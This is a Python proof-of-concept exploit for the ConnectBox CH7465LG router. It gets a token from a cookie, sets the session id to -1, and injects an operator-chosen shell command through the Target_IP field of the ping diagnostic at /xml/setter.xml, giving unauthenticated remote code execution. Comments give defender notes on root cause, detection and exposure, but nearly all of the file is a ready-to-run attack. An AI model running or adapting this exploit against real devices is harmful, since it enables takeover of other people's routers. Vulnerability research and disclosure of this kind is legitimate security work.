#!/usr/bin/env python3
"""
poc-rce.py: Unauthenticated Remote Code Execution for the ConnectBox (CH7465LG).
xitan - 2019 (https://xitan.me).
"""
import requests
import sys
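# Flat proof-of-concept driver. It makes two HTTP requests to the device:
#   1. GET  /index.html      - only to read the token the device sets in a cookie
#   2. POST /xml/setter.xml  - fun=126 with a Target_IP value that is not a host name
# No login request is sent at any point.
#
# Defender notes:
#   * Root cause (inferred from the payload shape, not from firmware source):
#     Target_IP appears to reach a shell command line unsanitised. The fix
#     belongs on the device: validate Target_IP as a host name or IP address
#     and pass it to the ping helper as an argument, not through a shell.
#   * Detection: a POST to /xml/setter.xml with fun=126 whose Target_IP
#     contains a double quote or ';' is never a legitimate ping target.
#   * Exposure: the request only needs network reachability of the web UI,
#     so limiting which hosts can reach that interface reduces the exposure.
if len(sys.argv) < 3:
    print("./poc-rce.py <router-ip> <command>")
    # sys.exit() instead of the site-provided exit(), which is missing when
    # the interpreter runs without the site module.
    sys.exit(1)

router_ip = sys.argv[1]
command = sys.argv[2]
# Bound both requests so an unreachable device fails instead of hanging.
timeout_seconds = 10

session = requests.Session()
# verify=False has no effect on plain http:// URLs; kept as the author wrote it.
index = session.get(
    'http://' + router_ip + '/index.html',
    verify=False,
    timeout=timeout_seconds,
)

# The token is the text between the first '=' and the next ';' of the
# Set-Cookie header. Read the header once and stop with a message when it is
# absent, instead of failing with a TypeError on None.
set_cookie = index.headers.get('Set-Cookie')
if not set_cookie:
    print('[-] No Set-Cookie header in the /index.html response; no token available.')
    sys.exit(1)
token = set_cookie.partition('=')[2].partition(';')[0]

# NOTE(review): the session id is simply set to '-1'; presumably the firmware
# accepts that value without an authenticated session, which is what the
# module docstring's "Unauthenticated" refers to - confirm against the device.
session.cookies['SID'] = '-1'

# NOTE(review): fun=126 together with the Ping_* fields looks like the web
# UI's ping diagnostic - inferred from the field names only.
data = {
    'token': token,
    'fun': '126',
    'Type': '1',
    # Host name followed by quote characters, ';' and the operator-supplied
    # command: this is the field the injection rides on.
    'Target_IP': 'google.com"\"; ' + command + ';',
    'Ping_Size': '64',
    'Num_Ping': '5',
    'Ping_Interval': '1'
}

setter = session.post(
    'http://' + router_ip + '/xml/setter.xml',
    data=data,
    verify=False,
    timeout=timeout_seconds,
)

# HTTP 200 only shows that the setter endpoint accepted the POST. It is not
# evidence that the command ran, so it cannot by itself confirm whether a
# given firmware is vulnerable or patched.
if setter.status_code == 200:
    print('[+] Command successfully sent.')
else:
    print('[-] Unexpected HTTP status from /xml/setter.xml: ' + str(setter.status_code))
    sys.exit(1)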